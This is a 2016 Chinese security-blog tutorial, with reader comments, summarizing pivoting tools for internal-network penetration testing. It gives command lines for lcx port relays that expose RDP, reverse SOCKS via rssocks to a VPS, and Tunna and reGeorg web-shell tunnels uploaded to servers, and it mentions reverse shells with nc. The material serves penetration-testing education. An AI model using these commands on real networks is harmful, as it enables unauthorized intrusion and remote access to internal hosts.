内网渗透中转发工具总结

TwoEyes 2016-04-27 10:44:00

最近一段时间内网渗透做的比较多,刚好今天比较有时间,就总结一下内网中转发的一些工具的使用。这里主要介绍了lcx、nc 、sSocket、tunna、reGeorg几款平时用的比较多的工具,网络上也有很多关于他们的介绍,而且也非常不错,但是并没有统一起来,写这篇文章就算是一个小小的汇总吧。

0x00 LCX转发


内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口

例如:lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389

将内网(192.168.43.137)的3389端口转发到公网(192.168.43.142)的51端口

然后在公网的机器上:

Lcx.exe –listen 监听51端口,转发到公网机器的3389端口

例如:Lcx.exe –listen 51 3389

这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP+3389 ,就连接上了内网机器的3389

0x01 NC 反弹CMDshell


本机:192.168.43.142(win7) 远程机器:192.168.43.137(xp)

正向连接:

在远程机器上(t参数可以省略)

在本地机器上

成功之后,本地机器就获得了一个远程机器的shell

反向连接:

在本机运行上

在远程机器上(t参数可以省略)

然后成功之后,我们在本地机器上看一下,已经获得了远程机器的cmdshell

这里还有前人总结的十种反弹shell的方法,很不错

0x02 sSocket


一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试。

下载地址:https://sourceforge.net/projects/ssocks/

先在vps 执行rcsocket.exe –l 1088 –p 8888 –vv, 监听1088端口

内网机器执行./rssocks –vv –s 192.168.30.103:8888(VPS)

成功,则会看到会话建立

设置代理,让本机可以通过VPS的1088端口访问内网机器。

本机上 ssh 192.168.43.136内网主机

成功ssh到内网机器

0x03 Tunna 正向代理


参考

proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 22 -v -s

然后在xshell中执行
ssh 127.0.0.1 8888,看到下面的样子,说明已经成功了

同样的,如果内网的机器是windows,就把3389转出来

proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 3389 -v

其中几个参数的解释:

  • -l 表示本地监听的端口
  • -r 远程要转发的端口
  • -v 详细模式

另外,如果脚本传到了内网A机器上,但是想登录内网B机器,那么可以-a参数指定机器

将内网中172.16.100.20主机的3389转发到本地
python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

0x04 reGeorg+proxifier 正向代理


reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高一些。这也是平时用的比较多的工具。

先将reGeorg的对应脚本上传到服务器端,直接访问显示“Georg says, 'All seems fine'”,表示脚本运行正常

运行python reGeorgSocksProxy.py -p 8888 -u http://www.xxx.com/tunnel.php

将proxifier打开,在Proxy Server中这样配置

然后就可以在本地访问内网的机器了

p24

成功3389到内网机器

评论

小胖子 2016-04-27 11:04:22

基本都是常见杀招,必须得会,有时候一种姿势不能高潮,得多用几种姿势。

珈蓝夜宇 2016-04-27 11:04:35

赞赞赞.想要和你生孩子.

C

cf_hb 2016-04-27 11:21:04


路人甲 2016-04-27 11:30:09

收藏

O

omego555 2016-04-27 11:57:43

必须关注

墨染 2016-04-27 12:35:33

mark下,regeorg的那个学习了

W

waht000 2016-04-27 12:41:05

mark下

F

feiyu 2016-04-27 13:58:49


小饼仔 2016-04-27 14:45:14

@小胖子 这个比喻,666

J

JotPot 2016-04-27 15:43:59

@珈蓝夜宇 在一起在一起在一起

J

Jumbo 2016-04-27 16:45:55

LZ,最后一个reGeorg,我代理以后,想连代理的那台机器的3389,mstsc那里输入127.0.0.1:端口和内网端口貌似都连不上。。

小葵 2016-04-27 17:46:44

写的太少了吧。 redu phpsocks5 phproxy SSH msf htran kingate s5.py 期待大牛补充。

小葵 2016-04-27 17:47:17

还有DNStunnel ICMPtunnel

W

winterFire 2016-04-27 19:24:52

@珈蓝夜宇 和我吧

我是360安全忍者小号r00t4dm 2016-04-28 07:50:11

reGeorg+proxifier 很好用

杨某某 2016-04-28 09:36:41

一直好奇,为什么lcx不直接转发到公网的3389,而是公网服务器自己再转发一次,求解答

神在堕落 2016-04-28 10:30:12

对于路由端口只做nat转发,且限定开放几个端口,内网机器无DNS,无法访问外网。这些端口转发的工具只能干着急。

路人甲 2016-04-28 10:30:18

@杨某某 因为公网vps开启了3389,端口会发生冲突。当然也可以直接转到公网3389,前提是vps3389没有开启

路人甲 2016-04-28 10:31:07

赞一个!总结得不错,如果加上优点与缺点就更完美了!

S

SLAckEr 2016-04-28 11:17:19

请求转载

C

Cacker 2016-04-28 12:01:57

6666666666学习了

Q

qglfnt 2016-04-28 14:55:00

不错,学习了!

路人甲 2016-04-29 08:49:13

炒冷饭

G

google 2016-05-02 23:47:35

用的都很多了,有更好的,更有意思的吗?

B

blnxz 2016-05-12 15:03:38

我现在遇到的情况,貌似只有regeorg+proxychains 可以将我的机子代理进入内网,其他的全不行。但是代理进去以后,目标机子的3389端口拒接 我的链接,他旁边的机子全部都无法访问,哪怕ping,或者扫描扫描的,全部不行。
现在的我代理进去内网以后,我感觉跟没代理进去差不多,大牛,还有什么其他方法的思路么?

wywwzjj 2019-05-16 22:19:21

学习

T

TwoEyes

你看到我的小熊了吗

twitter weibo github wechat

随机分类

事件分析 文章:223 篇
神器分享 文章:71 篇
漏洞分析 文章:212 篇
APT 文章:6 篇
密码学 文章:13 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录